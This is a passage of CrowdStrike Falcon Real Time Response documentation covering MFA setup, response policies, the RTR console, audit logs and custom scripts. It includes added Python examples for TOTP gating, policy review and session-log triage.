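    print(gate.request_gated_action("alice", 59 + 3600))                 # allowed
    print(gate.request_gated_action("alice", 59 + GRACE_PERIOD_SECONDS))  # prompt
```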

User configuration

If your CID uses single sign-on (SSO) for Falcon login, individual users must also install a TOTP authentication app on their mobile device and set up an MFA profile specifically for RTR access using a QR code that Falcon provides. Users that log in with Falcon MFA have already completed this process. Falcon MFA for RTR is supported on most authentication apps that comply with the TOTP standard, such as Google Authenticator and Microsoft Authenticator.

Requirements
  • Roles: Falcon Administrators can enable and configure Falcon MFA for RTR.

  • Falcon login: Accounts must use Falcon MFA or a third-party SSO for Falcon console login.

  • TOTP mobile application: Falcon MFA for RTR requires use of a TOTP authentication application, such as Google Authenticator or Microsoft Authenticator.

  • Falcon Flight Control:

    • Falcon MFA for RTR is enabled and managed independently by each CID in a Falcon Flight Control environment.

    • Users with multi-CID access: Falcon MFA for RTR enforcement in CIDs other than a user’s home CID requires both the home CID and the additional CID to use Falcon MFA or a third-party SSO for Falcon console login.

Limitations
  • Falcon MFA for RTR is not supported through the CrowdStrike API.

Enable and configure Falcon MFA for RTR

Real Time Response identity verification isn’t enabled by default. Falcon Administrators can turn on MFA enforcement for all users by going to Support and resources > Resources and tools > General settings and configuring up-front settings that specify the MFA trigger and how often users are prompted.

After setting up MFA for the organization, users are prompted to authenticate the next time they attempt to execute the MFA-enforced operation. If a user is not set up with Falcon MFA for RTR, the MFA prompt will invite them to enroll.

Note: Enabling Real Time Response identity verification applies Falcon MFA to all users in the CID, regardless of response policies and associated host groups. To enable and configure Falcon MFA for RTR, you must already have Falcon MFA set up in your user profile.

Step 1: Enable Real Time Response identity verification

  1. Go to General settings (Support and resources > Resources and tools > General settings).

  2. Click Security.
  3. In Real Time Response identity verification, click to turn on Falcon MFA.

    Note: This task requires user enrollment in Falcon MFA. If you are not currently enrolled in Falcon MFA, you will be prompted to log out and set up Falcon MFA before proceeding.
  4. In the MFA verification window, enter the 6-digit code generated by your mobile authentication app.

Step 2: Configure Falcon MFA for RTR settings

  1. Specify Gated UI action for MFA. Choose Before initiating any RTR session or action, Before running a 'run' or 'kill' command or quick action (default), or Before enabling a Fusion SOAR workflow with any RTR action.

  2. Set a Grace period that determines how often users must reauthenticate (current default: 24 hours). After a user authenticates with TOTP, they are not prompted for MFA again for the amount of time set in the grace period.

  3. Click Save.

  4. In the MFA verification window, enter the 6-digit code generated by your mobile authentication app.
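
As an added illustration of the two settings configured above (example code written for this page, not CrowdStrike's implementation), the following Python models the gated-action choice and the grace period as a decision function and checks the 6-digit code with a standard RFC 6238 TOTP computation, which is what TOTP authenticator apps such as Google Authenticator and Microsoft Authenticator generate. The function names, the gate option identifiers and the assumption that the manual activation key is base32 are mine; the three gate options and the 24-hour default grace period come from the page.

```python
# Added example, not CrowdStrike's code. Models the MFA trigger ("gated
# action") and grace period settings, and verifies a 6-digit TOTP code
# (RFC 6238: SHA-1, 30-second step, one step of clock drift either side).
import base64
import hashlib
import hmac
import struct

# The three gate options offered in the console (identifiers are assumptions).
GATE_ANY_ACTION = "before_any_rtr_session_or_action"
GATE_RUN_OR_KILL = "before_run_or_kill_command"            # Falcon's default option
GATE_FUSION_WORKFLOW = "before_enabling_fusion_workflow_with_rtr_action"

DEFAULT_GRACE_SECS = 24 * 60 * 60   # page: current default grace period is 24 hours
TOTP_STEP_SECS = 30
TOTP_DIGITS = 6


def action_is_gated(action, gate=GATE_RUN_OR_KILL):
    """Does this RTR action fall under the configured MFA trigger?"""
    if gate == GATE_ANY_ACTION:
        return True
    if gate == GATE_RUN_OR_KILL:
        # run/kill commands and quick actions; the first token is the command name
        return action.split()[0].lower() in {"run", "kill"}
    if gate == GATE_FUSION_WORKFLOW:
        return action == "enable_workflow"
    raise ValueError("unknown gate setting: %r" % gate)


def needs_prompt(action, last_verified_at, now, gate=GATE_RUN_OR_KILL,
                 grace=DEFAULT_GRACE_SECS):
    """Prompt only for a gated action whose last TOTP verification is older than the grace period."""
    if not action_is_gated(action, gate):
        return False
    return last_verified_at is None or (now - last_verified_at) >= grace


def secret_from_activation_key(key):
    """Assumption: the manual activation key is base32, the usual authenticator-app encoding."""
    return base64.b32decode(key.replace(" ", "").upper())


def totp(secret, at_time, step=TOTP_STEP_SECS, digits=TOTP_DIGITS):
    """RFC 6238 TOTP: HOTP over the time-step counter with SHA-1 and dynamic truncation."""
    counter = int(at_time) // step
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def verify_code(secret, code, at_time, drift_steps=1):
    """Accept the code for the current step or `drift_steps` steps either side.

    compare_digest keeps the string comparison itself free of timing leaks.
    """
    return any(hmac.compare_digest(totp(secret, at_time + k * TOTP_STEP_SECS), code)
               for k in range(-drift_steps, drift_steps + 1))


def gate_rtr_action(action, code, secret, last_verified_at, now, gate=GATE_RUN_OR_KILL):
    """Combined check. Returns (allowed, updated_last_verified_at)."""
    if not needs_prompt(action, last_verified_at, now, gate):
        return True, last_verified_at
    if code is not None and verify_code(secret, code, now):
        return True, now          # start a new grace period
    return False, last_verified_at


if __name__ == "__main__":
    # Constructed demo using the RFC 6238 reference test secret (base32 of "12345678901234567890").
    secret = secret_from_activation_key("GEZD GNBV GY3T QOJQ GEZD GNBV GY3T QOJQ")
    print("code at t=59:", totp(secret, 59))                       # 287082 per the RFC vectors
    print("ls gated by default?", needs_prompt("ls C:\\", None, 59))
    print("run allowed with code?", gate_rtr_action("run C:\\tool.exe", totp(secret, 59), secret, None, 59))
```

The demo uses the RFC 6238 reference secret, so the code at time 59 is 287082. A real deployment would keep each user's enrolled secret server-side and store the verification timestamp per user, which is what lets the grace period suppress repeat prompts.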

User setup

As part of the setup process, each user must individually enroll in Falcon MFA by downloading a TOTP authentication application on their mobile device and syncing it to Falcon. This process is already completed for users who log in to Falcon with Falcon MFA. Unenrolled users are automatically prompted to set up Falcon MFA when they attempt to execute the MFA-enforced operation.

Step 1. Download a TOTP authentication app

Download Google Authenticator, Microsoft Authenticator, or another TOTP-compatible application of your choice on your mobile device. You’ll need access to this device to verify your identity when performing the MFA-enforced RTR operation in Falcon.

Step 2. Set up Falcon MFA on your authentication app

  1. Open the Falcon MFA for RTR setup workflow. This window opens when you attempt the MFA-enforced RTR operation. You can also initiate the process from your user profile settings (User profile > your username/email address).
    Note: For added security, you're required to log out and back in to set up MFA for RTR.
  2. Using your authenticator app, scan the QR code or enter the manual activation key displayed in Falcon.

  3. Enter the 6-digit verification code from your authentication app and click Set up Falcon MFA for RTR.
    Note: For security, your 6-digit enrollment code must be entered within 5 minutes after scanning the QR code. Codes entered after 5 minutes may result in an error and require logging out and back in to Falcon to resume enrollment.

Configuring response policies

In Host setup and management > Response and containment > Response policies, create and edit response policies with the response capabilities your host groups need. This is where you customize which Real Time Response commands can be executed on your environment’s hosts.

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.

The default policy provides baseline Real Time Response capabilities and is enabled by default for all hosts. Create additional response policies for your host groups as needed to make sure the response actions that can take place are aligned with your environment’s compliance requirements and needs. If you need to prevent all connections to, and response actions on, a group of hosts, create a response policy with nothing enabled and assign those hosts to it.

  • Users with the Falcon Administrator role can create and configure Response Policies.

  • Response policies operate with the same policy precedence rules as Prevention policies. For more information, see Policy precedence.

Note: Response policy setting changes might take some time to take effect on all hosts.

Connecting to a host

You can connect to a host to perform Real Time Response from a number of places in the Falcon console. Multiple Falcon users can connect to the same host simultaneously.

Endpoint security > Monitor > CrowdScore incidents:

  1. Open an incident’s view.

  2. On the right of the host details, click the three-dot menu and click Connect to host.

Endpoint security > Monitor > Endpoint detections:

  1. Select a detection.

  2. In its details, click Connect to Host.

Host setup and management > Manage endpoints > Host management:

  1. Select a host.

  2. In its details, click Connect to Host.

Exposure management > Assets > Asset graph:

  1. In the asset graph, click the asset to open the details panel.

  2. Open the Actions menu.

  3. Click Connect to host.

You can connect to hosts from the Investigate app.

Note: These access points always show the Connect to Host links, but only users with Real Time Responder roles can actually launch Real Time Response sessions.

Investigate > Search > Hosts:

  1. Perform a search.

    Tip: If you see a lock icon in Apply, add a valid computer name to the Host field.
  2. In the Real Time Response column, click Connect to Host.

Investigate > Search > Advanced event search

  1. Perform a search and view an event.

  2. In the event’s details, select Connect to Host from the Event Actions menu.

Default response policy

The Default response policy is applied to hosts that are not specifically assigned to another response policy. It provides a solid baseline with guardrails around some of the higher risk commands. The default response policy has all settings enabled except Custom Scripts and run.

Real Time Response policy settings

Real Time Response

This is the basic policy setting required to perform any Real Time Response actions on hosts.

Custom Scripts

This setting controls whether users with RTR Active Responder or RTR Administrator can run custom scripts. Click Enable All in the title bar or enable the toggle in the expanded view.

Falcon Scripts

When enabled, RTR Administrators can view and execute Falcon scripts. The Custom Scripts setting must be enabled to turn on Falcon scripts.

High risk commands

The settings in this section control availability of a collection of commands that have a higher potential to cause problems if improperly executed:

  • get

  • put

  • run

  • memdump (Windows only)

  • xmemdump (Windows only)

  • put-and-run (Windows and Mac only)

Note: cswindiag (Windows only) is also considered a high risk command because it relies on put-and-run.

Click Enable All in the title bar or enable toggles individually in the expanded view.
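
To make the dependency rules above concrete, here is an added Python example (written for this page, not CrowdStrike's code) that models a response policy as a dictionary of the toggles named in this section and works out which capabilities a host would effectively get, so the high risk commands a policy exposes can be reviewed before the policy is enabled. The setting names, the default policy's values, the platform restrictions and the two dependency rules (Falcon scripts need Custom Scripts; cswindiag rides on put-and-run) are taken from the page text; the dictionary layout and function names are assumptions for illustration.

```python
# Added example, not CrowdStrike's code. Review which Real Time Response
# capabilities a response policy actually grants, per platform.

# High risk commands and the platforms they apply to (from the page).
HIGH_RISK_COMMANDS = {
    "get": {"windows", "mac", "linux"},
    "put": {"windows", "mac", "linux"},
    "run": {"windows", "mac", "linux"},
    "memdump": {"windows"},
    "xmemdump": {"windows"},
    "put-and-run": {"windows", "mac"},
}

# The default policy has every setting enabled except Custom Scripts and run.
# (Dictionary layout is an assumption; the values come from the page.)
DEFAULT_POLICY = {
    "real_time_response": True,
    "custom_scripts": False,
    "falcon_scripts": True,     # toggle is on, but only effective with custom_scripts
    "get": True, "put": True, "run": False,
    "memdump": True, "xmemdump": True, "put-and-run": True,
}

# A lock-down policy with nothing enabled prevents connections and response actions.
LOCKDOWN_POLICY = {key: False for key in DEFAULT_POLICY}


def effective_capabilities(policy, platform="windows"):
    """Return the set of capabilities hosts under `policy` actually get.

    Rules from the page: the Real Time Response toggle is required for any
    action; Falcon scripts also need Custom Scripts; cswindiag (Windows only)
    is available because it relies on put-and-run. Commands restricted to
    other platforms are dropped.
    """
    if not policy.get("real_time_response", False):
        return set()
    caps = {"real_time_response"}
    if policy.get("custom_scripts", False):
        caps.add("custom_scripts")
        if policy.get("falcon_scripts", False):
            caps.add("falcon_scripts")
    for command, platforms in HIGH_RISK_COMMANDS.items():
        if policy.get(command, False) and platform in platforms:
            caps.add(command)
    if "put-and-run" in caps and platform == "windows":
        caps.add("cswindiag")
    return caps


def review_policy(policy, platform="windows"):
    """Sorted list of high risk commands (plus cswindiag) the policy exposes on a platform."""
    caps = effective_capabilities(policy, platform)
    return sorted(c for c in caps if c in HIGH_RISK_COMMANDS or c == "cswindiag")


if __name__ == "__main__":
    print("default, Windows:", review_policy(DEFAULT_POLICY))
    print("default, Linux:  ", review_policy(DEFAULT_POLICY, "linux"))
    print("lockdown:        ", review_policy(LOCKDOWN_POLICY))
    print("falcon_scripts effective in default policy?",
          "falcon_scripts" in effective_capabilities(DEFAULT_POLICY))
```

Running the review against a policy before enabling it shows, for example, that the default policy still exposes memdump, xmemdump, put-and-run and therefore cswindiag on Windows hosts even though run is off, and that turning on the Falcon Scripts toggle has no effect until Custom Scripts is also enabled.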

Creating a response policy
  1. Go to Host setup and management > Response and containment > Response policies .

  2. Click Add New Policy.

  3. In the New Policy Details dialog, enter a policy name and description.

  4. Click Create to create the policy.

  5. Enable or disable individual response policy settings on the Policy details page.

  6. Click Save to save your settings.
    Note: Enable the new policy to apply it to hosts. All new policies are disabled by default so that you can configure them completely before they take effect.

Assigning a response policy to host groups

On the Response Policies page:

  1. Find the policy you want to assign to a host group and click the edit icon on the far right to go to its details page.

  2. Go to the Assigned Host Groups tab.

  3. Click Add groups to policy in the upper-right.

  4. In the Add Groups to Policy dialog, select one or more groups.

  5. Click Add groups to policy. After you assign a group to a policy, that group will no longer be shown when you select additional groups.

Enabling or disabling an entire response policy

Each response policy can be enabled or disabled altogether. This allows you to configure a policy completely before turning it on to impact hosts and quickly turn it off if needed. When a policy is first created, it must be enabled before it is applied to hosts. To turn a policy on or off, click Enable or Disable in the top right of any Policy details page.

Deleting a response policy

You can permanently remove a policy by deleting it. You must disable the policy before you can delete it. When you delete a policy, the hosts that were assigned to it are reassigned to another policy based on your policy precedence.

To delete a policy, click Delete on any Policy details page.

Using Real Time Response

Using the RTR console

From the RTR console, you can execute commands, run scripts, and view information about the host you’re connected to.

  • The Hostname, Platform, and the host’s Connection status with session start timestamp display at the top of the window.

  • Available commands you can run are listed in the middle of the console.

  • Expand the details panel from the right to see:

    • Host info tab:

      • View attributes and metadata for the connected host.

      • Click the Response policy name to open the host’s associated response policy settings.

      • Click the Host ID to view the host details on the Host management page.

    • Scripts tab:

      • View Falcon scripts and your CID’s custom scripts that you can run on the host.

      • Search for a script by name or sort the list of scripts by most recently used date or alphabetically by name.

      • Click a script name to populate the command field.

      • View details, insert, edit, or delete from the three-dot menu on the right of a specific script.

    • Files tab:

    • Detections tab:

      • See a list of the connected host’s detections.

      • Sort the list by date (Newest/Oldest) or severity (Critical/Informational).

      • Expand a specific detection to see additional info and link to more details in Endpoint detections.

  • Run commands and custom scripts on the host from the tabs at the bottom of the console.

Running commands

On the host you are connected to, you can run commands from the list in the Run Commands tab of the Real Time Response window. Run the help command for a list of all available commands.

Read about the available commands in Real Time Response commands and role permissions and Additional Info: Real Time Response Commands.

Tips for running commands

  • Expand the session details panel from the right to see Custom scripts and “put” files. You can click the names in either of these sections to populate the command field.

  • Type in a command to see available arguments.

  • If a command is taking too long and you need to move on to other commands, click Cancel. You won’t see the output of commands you cancel, but they do continue to run in the background.

  • Command flags are not case-sensitive on Windows. They are case-sensitive on macOS and Linux.

  • When running a command that includes a file path with a space, wrap the path in quotation marks, such as "C:\Program Files\myprogram.exe".

  • Be aware when working with files that are on a network share. If the host loses access to the network share, unexpected behavior might result.

Running scripts

You can run Falcon scripts and custom scripts from either tab in a Real Time Response session.

Running scripts from the Run Commands tab

On the Run Commands tab, you have two options to populate the command field to run a Falcon script or a custom script:

  • Expand the session details panel from the right to see available Falcon scripts and custom scripts under the Scripts tab. Click the name of any script to populate the command field or click Open menu and select Insert script. You can search and sort the scripts lists and select View details to see the script content and provide Falcon script arguments.

  • For custom scripts, run the runscript command with one of the following flags:

    • CloudFile: Enter the name of an existing custom script already saved in the CrowdStrike cloud directly into the command line

    • Raw: Enter the script content directly into the command line. (RTR Administrator only). Enclose the entire script contents in triple backticks.

    • HostPath: Enter the file path of an existing custom script stored locally on the remote host (RTR Administrator only)

  • For Falcon scripts, run the falconscript command with the following flags:

    • Name: Enter the name of the Falcon script. For example, "FileInfo".

    • JsonInput: Enter the JSON input for the Falcon script. Enclose it in single quotes and triple backticks. For example: ```'{"Path":"C:\\myfile.txt"}'```

Tips for running custom scripts

  • PowerShell code cannot be used in -CommandLine arguments.

  • Re-quote special characters in -CommandLine arguments.

This table provides examples of valid and invalid -CommandLine arguments.

Table 1. Command line argument examples

  • Valid argument: runscript -CloudFile=test_script -CommandLine=```-TestArg 'semi_colon;_in_arg'```

  • Valid argument: runscript -CloudFile=test_script -CommandLine=```-TestArg "(arg_val_in_curly_bracket)"```

  • Invalid argument: runscript -CloudFile=test_script -CommandLine=```-TestArg pipe|in_arg```

Running scripts from the Edit & Run Scripts tab

On the Edit & Run Scripts tab (RTR Administrator only):

  • Directly enter or paste your script into the script field.

  • Expand the session info panel from the right to see available Falcon scripts and custom scripts under the Scripts tab. Click the name of any script to populate the script field, then click Run.

Users with the RTR Administrator role can also create custom scripts, edit existing scripts from the Edit & Run Scripts tab, and save them to the cloud. Read more in Managing custom response scripts.

Reviewing the script output

Script execution results display in the RTR terminal in text or JSON format.

  • Custom scripts: Can output to plain text or JSON, depending on the script’s output schema configuration.

  • Falcon scripts: Output to JSON only.

Click output settings to access these optional actions:

  • Copy to clipboard: Copy the full text or JSON output exactly as it’s displayed.

  • Download: Download a text or JSON file of the output in the format that it’s displayed.

  • View in new window: Open the output in a separate window for easier viewing.

Ending a connection

End your connection to a host by clicking the End session button on the upper right corner of the window, or by closing the browser tab. Real Time Response sessions automatically end after 10 minutes of inactivity.

If you close a Real Time Response session's browser tab, you can reconnect to that session within 5 minutes. When you reconnect, you will have access to your previous command history. If you don't reconnect, the session automatically ends after 5 minutes.

Reviewing Real Time Response audit logs

Real Time Response-related activities are tracked and can be viewed in two audit logs in Falcon.

  • RTR sessions: Review the commands performed in each Real Time Response session’s details (includes files retrieved using the get command)

  • Response scripts and files: See the event history of maintenance performed on:

    • custom scripts

    • files for the put command

Roles info: Real Time Response audit logs

  Audit log                          | RTR Read Only Analyst              | RTR Active Responder               | RTR Administrator                  | Falcon Administrator
  Real Time Response Session Details | Can view their own session details | Can view their own session details | Can view their own session details | Can view all session details
  Custom scripts audit log           | Cannot access                      | Cannot access                      | Can see all events                 | Can see all events
  "Put" files audit log              | Cannot access                      | Cannot access                      | Can see all events                 | Can see all events

Viewing audit logs about Real Time Response sessions

The RTR sessions page (Audit logs > Audit logs > RTR) provides a history of recorded activity for your CID’s Real Time Response sessions.

  • Session start time: The date and time the session began.

  • Session status: The current session status (Active or Inactive).

  • User: The user who connected to the host.

  • Hostname: The host that was accessed.

  • Connected from: The source where the session was initiated from.

  • Commands used: The commands that were run.

    Note: Certain command fields may be redacted for security purposes.

  • Session duration: The time between the session start and the last command run on the host.

    Note:

    • Commands such as help, clear, and history are not recorded in the audit log.

    • A Duration of 0 secs displays when no commands are run during the session.

    • A session will show a Duration without any Commands used when a user initiates a session with a host, closes the session browser tab, and then initiates another session with the same host. In this case, the Duration is calculated as the time between the first and second initiations.

  • Retrieved files: The number of files that were uploaded from the host to the CrowdStrike cloud using the get command (files are available for 7 days)

  • Three-dot menu: Access options to open the session details panel or generate a CSV or JSON export of the session data.

The default view orders sessions by start time, with the most recent session displaying first. Reorder the list by clicking any column header with an arrow beside its name. Use the filter menus to display only the sessions you’re interested in.
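
The columns above are enough to triage sessions offline from the CSV or JSON export. The following added Python example (written for this page, not CrowdStrike's code; the export's real field layout is not documented here, so the record format below is a constructed assumption modelled on the column names) applies the page's rules, session duration measured from start to the last recorded command with help, clear and history ignored, and flags any session that used a command from the High risk commands list for review.

```python
# Added example, not CrowdStrike's code. Triage constructed RTR session
# audit records: compute duration the way the page describes and flag
# sessions that used high risk commands.
from datetime import datetime, timezone

UNRECORDED = {"help", "clear", "history"}           # not recorded in the audit log
HIGH_RISK = {"get", "put", "run", "memdump", "xmemdump", "put-and-run", "cswindiag"}

# Constructed sample export (field names are assumptions based on the column names).
SAMPLE_SESSIONS = [
    {"session_id": "s-001", "user": "analyst@example.com", "hostname": "WS-0421",
     "connected_from": "Endpoint detections",
     "session_start": "2025-01-10T09:00:00Z",
     "commands": [
         {"time": "2025-01-10T09:00:05Z", "command": "help"},
         {"time": "2025-01-10T09:01:00Z", "command": "ls C:\\Users"},
         {"time": "2025-01-10T09:04:30Z", "command": "get C:\\Users\\Public\\suspect.exe"},
     ]},
    {"session_id": "s-002", "user": "analyst@example.com", "hostname": "WS-0421",
     "connected_from": "Host management",
     "session_start": "2025-01-10T10:00:00Z",
     "commands": [{"time": "2025-01-10T10:00:02Z", "command": "history"}]},
    {"session_id": "s-003", "user": "admin@example.com", "hostname": "SRV-DB01",
     "connected_from": "Advanced event search",
     "session_start": "2025-01-10T11:00:00Z",
     "commands": [
         {"time": "2025-01-10T11:02:00Z", "command": "put collector.ps1"},
         {"time": "2025-01-10T11:02:30Z", "command": "runscript -HostPath=C:\\collector.ps1"},
     ]},
]


def _ts(value):
    """Parse the constructed ISO-8601 UTC timestamps."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def recorded_commands(session):
    """Commands the audit log keeps: help, clear and history are not recorded."""
    return [c for c in session["commands"]
            if c["command"].split()[0].lower() not in UNRECORDED]


def session_duration_secs(session):
    """Seconds from session start to the last recorded command; 0 when none were run."""
    commands = recorded_commands(session)
    if not commands:
        return 0
    last = max(_ts(c["time"]) for c in commands)
    return int((last - _ts(session["session_start"])).total_seconds())


def high_risk_commands(session):
    """Base command names from the page's high risk list used in this session."""
    used = {c["command"].split()[0].lower() for c in recorded_commands(session)}
    return sorted(used & HIGH_RISK)


def triage(sessions):
    """One summary row per session; `review` is set when high risk commands were used."""
    rows = []
    for s in sessions:
        risky = high_risk_commands(s)
        rows.append({
            "session_id": s["session_id"], "user": s["user"], "hostname": s["hostname"],
            "connected_from": s["connected_from"],
            "duration_secs": session_duration_secs(s),
            "high_risk": risky, "review": bool(risky),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_SESSIONS):
        print(row)
```

Session s-002 shows the documented edge case: its only command is history, which is not recorded, so the duration is 0 seconds. Sessions that retrieved files with get are worth pairing with the Retrieved files column, since those files are only available for 7 days.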

View a session’s details

Click a session in the list to open the details panel. View high-level information about the RTR session, including details about the host, retrieved files, and detections. In addition, users with the RTR Administrator or the RTR Active Responder role can see the upload status of get command files. They can also download and delete files that were retrieved within the last 7 days. Users with the Falcon Administrator role can view in-progress and completed file uploads but cannot download or delete retrieved files.

  • Session details tab:

    • See the session status, the user who connected to the host, the host that was accessed, the session start and end times, and the session duration.

      • The Duration calculates the time between the session start and last command run on the host.

      • Commands such as help, clear, and history are not recorded.

      • A Duration of 0 secs displays when no commands are run during the session.

      • A Duration displays in sessions where no commands are issued when a user initiates a session, closes the session browser tab, and initiates another session with the same host. In this case, the Duration calculates the time between the first and second initiations.

    • Sessions where commands are used include a timeline of session activity.

  • Host info tab:

    • View attributes and metadata for the connected host.

  • Files tab:

    • See any files that were retrieved from the host using the get command.

  • Detections tab:

    • See a list of the connected host’s detections.

    • Sort the list by date (Newest/Oldest) or severity (Critical/Informational).

    • Expand a specific detection to see additional info and link to more details in Endpoint detections.

Viewing the "put" files and custom scripts audit log

On the Response scripts and files page (Host setup and management > Response and containment > Response scripts and files), click the Audit log tab to see a record of each time an event has taken place involving files for the put command and custom scripts. See the date, the user involved, the event that took place, the type (“put” file or Custom script), the name of the file or script, and any comments they might have recorded.

Click any row to expand the log info panel to see more details about the event, including the description, hash, “put” file size, and custom script content.

Export the audit log or customize the columns that are displayed by clicking the icons in the upper right:

  • Export

  • Configure table columns

Viewing Falcon scripts

Falcon scripts are predefined scripts that you can execute out of the box on Windows hosts. If you’ve enabled Falcon scripts in the Response policy settings, you can view the Falcon scripts library on the Response scripts and files page (Host setup and management > Response and containment > Response scripts and files). See a summary of key info about what each script does and how it’s used, and select any script in the list to open the details panel for additional info, including the script code. You cannot directly edit Falcon scripts, but you can copy the script code and save it as a custom script to modify it for your own purposes.

You can also view Falcon scripts on the Scripts tab of the details panel in an RTR session. You can search and sort the Falcon scripts list and open a script to see the script content, provide arguments, and insert the script in the command line.

Managing custom response scripts

You can reach your existing collection of custom scripts either from the Response scripts and files page or from within a Real Time Response session.

Testing a custom script before saving it

Test scripts before you save them: You can run any command from the Edit & Run Scripts tab of a response session without saving.

When you are ready to add a script to your list of custom scripts, click Save As.

Creating a new custom script

You can create custom scripts from the Response scripts and files page or from within a Real Time Response session.

  • From the Response scripts and files page, go to the Custom scripts tab and click Create script.

  • From a Real Time Response session, go to the Edit & Run Scripts tab and click Save As.

    The Create script dialog appears so that you can finish defining the script. Any content you have entered in the script field shows up in the Create script dialog's Type or Paste Script field.

Supported languages:

  • Windows: PowerShell

  • macOS: zsh

  • Linux: bash

Size guidelines and limitations: The CrowdStrike cloud can generally handle scripts up to 40KB. The actual limits you encounter might be higher or lower. Script sizes are constrained by the underlying messaging architecture that Real Time Response uses. Because scripts are saved in encoded format and carry some additional overhead, we can’t pinpoint an exact size guideline.

Workaround: To work around script size limitations, you can run the script directly from the remote host’s file system. Use the put command to load the script onto the remote host, then use runscript with the -HostPath flag to run the script.

Script runtime limitations: We recommend you avoid creating scripts that have a long runtime. Long-running scripts might be terminated by the Falcon sensor, which will not persist script execution processes indefinitely.

Scripts and workflows: You can invoke your scripts as actions in Falcon Fusion SOAR workflows. For more info, see Using custom scripts with Fusion SOAR workflows.

Additional notes about creating and running custom scripts

  • Authors should treat their scripts as “stateless,” meaning each invocation of the script is independent of any and all prior runs.

  • If script content is provided as part of the -Raw flag or if command line arguments are provided as part of the -CommandLine flag, we recommend you enclose the supplied arguments in triple-backticks (for example, ```\```) to avoid any strange special character interpretation issues.

  • Edit the -Timeout flag to longer than the default 60 seconds if you need the sensor to wait longer for script execution to complete.

  • For PowerShell scripts: The scripts run in the local system context of the remote host as a separate PowerShell background job. Because of this, the output of some commands, such as Write-Host, is not displayed in the Real Time Response session. For more info about PowerShell background jobs, see Microsoft’s documentation.

Editing a script

You can reach the Edit script dialog either from the Host setup and management > Response and containment > Response scripts and files page or from within a Real Time Response session.

Important: A script might be shared with workflows to use as an action in those workflows. If a script is used in more than one workflow, be careful when editing the script to ensure that all workflows that use the script still behave as expected. The console provides a link to a list of workflows that use the script so you can remove the script from a workflow or disable the workflow. Alternatively, to find the workflows that use the script, go to Next-Gen SIEM > Fusion SOAR > Workflows and use the Actions filter to match the script name.

Create/Edit script dialog

The Create script and Edit script dialogs share the same fields.

Script dialog field descriptions

This table explains the items in the script dialog in the order seen in the dialog. Each entry names the option, field, or tab, followed by its description.

Script name

A unique identifier for the script

Script description

An overview of the script that explains what it does, when to use it, and why

Shell type

The type of shell needed to run the script

Script access

  • Only me

  • RTR Administrator

  • RTR Administrator and RTR Active Responder

Sets who can run or edit this script.

  • Only the script’s creator can run or edit the script.

    Note: When you select this option, you can’t share the script with workflows.
  • Users with the RTR Administrator role can run or edit the script.

    Note: These users are the only users who can add custom-script actions to workflows.
  • Depends on the role:

    Users with the RTR Administrator role have the access mentioned in the previous bullet.

    Users with the RTR Active Responder role can run the script but cannot edit it.

All scripts saved to the cloud can be viewed by users with the Falcon Administrator role.

Share with workflows

Makes the script available as an action in Falcon Fusion SOAR workflows

Script (tab)

The actual script

If you reach this dialog from a Real Time Response session, this field is populated with the contents of the script field when you click Save As in that session’s Edit & Run Scripts tab.

Input schema (tab)

Optional. Only needed if the script is shared with workflows and requires input.

Specifies a JSON schema to validate input to the script.

Instead of providing the schema directly, you can provide JSON that uses the expected format and convert it: Find the Convert JSON to JSON schema text and click the + icon on that line to show the field where you enter the JSON and the Convert button.

Note: Do not use device_id as a field name. This name is reserved.

See Using custom scripts with Fusion SOAR workflows.

Output schema (tab)

Optional. Only needed if the script is shared with workflows and has output that you want to separate into multiple fields.

Specifies a JSON schema to define the script’s output.

If a script has output but you don’t specify a schema, all the output goes in the stdout field.

Note: Do not use stdout as a field name. This name is reserved and is used even when your script does not have output. Also, do not use Standard output as a title. This title is reserved.

Instead of providing the schema directly, you can provide JSON that uses the expected format and convert it: Find the Convert JSON to JSON schema text and click the + icon on that line to show the field where you enter the JSON and the Convert button.

See Using custom scripts with Fusion SOAR workflows.

Comments (tab)

Text to appear in the audit log (Host setup and management > Response and containment > Response scripts and files, then click View audit log).

Running this script could lead to unexpected system behavior

Optional. For use when sharing the script with workflows.

Indicates the script makes changes to the system, such as deleting files.

When this option is selected, adding this script’s associated action to a workflow produces a warning to the workflow author.

Using custom scripts with Fusion SOAR workflows

You can invoke your scripts as actions in Falcon Fusion SOAR workflows.

If your script needs input:

  • The input must be in the JSON format.

  • You need a JSON schema for that input to make sure the input format is followed.

    This schema can’t use the reserved device_id field name.

Similarly, if your script has output:

  • The output must be in JSON.

  • By default, all the output goes into a single field called stdout. If your script has output that you want to separate into multiple fields, you must create a JSON schema for that output so that any consumers of that output know the format.

    Note: Do not use stdout as a field name. This name is reserved and is used even when your script separates output into multiple fields.
  • The script output should match the JSON schema.

The following sections discuss how to handle JSON in your scripts and how to create the schemas.

After you test your script, share it with workflows so that the script shows up in Falcon Fusion SOAR workflows as a possible action. For more info about workflows, see Fusion SOAR.

Accepting and producing JSON in your scripts

To create scripts that accept and produce JSON, you have several options.

Note: These examples assume you have input and output schemas in place. The Falcon console can create these schemas for you. You can see sample schemas in Example: Creating a custom script to use with a workflow.
  • For Windows / PowerShell

    PowerShell has these conversion utilities: ConvertFrom-Json and ConvertTo-Json

    Here’s an example to show their usage:

    # Parse the JSON passed in -CommandLine and read its "name" field
    $name = $args[0] | ConvertFrom-Json | Select-Object -ExpandProperty 'name';
    $date = Get-Date;
    # Build the result as a hashtable and emit it as JSON on stdout
    $out = @{
        Message = "Hello, $name"
        Date = $date.DateTime
    }
    $out | ConvertTo-Json;

    If you saved those lines to a script named test script 1, you can run the script as follows:

    runscript -CloudFile="test script 1" -CommandLine=```'{"name": "Tim"}'```

  • For macOS / zsh and Linux / bash, various tools are available to handle JSON.

    • jq is a CLI tool for reading values from JSON.

    • Python and other scripting languages often provide native support for JSON. Python is available on macOS by default. Here is an example using it.

      # Parse the JSON passed in -CommandLine (the last argument) and emit JSON on stdout;
      # "$@" is quoted so the JSON survives as a single argument
      python -c "import json, sys
      from datetime import datetime
      data = json.loads(sys.argv[-1])
      print(json.dumps({'Message': 'Hello, ' + data['name'], 'Date': datetime.now().isoformat()}))
      " "$@"

      If you saved those lines to a script named test script 2, you can run the script as follows:

